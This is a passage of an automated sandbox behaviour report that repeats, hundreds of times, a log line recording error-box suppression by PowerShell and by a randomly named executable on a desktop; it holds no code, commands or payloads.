      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
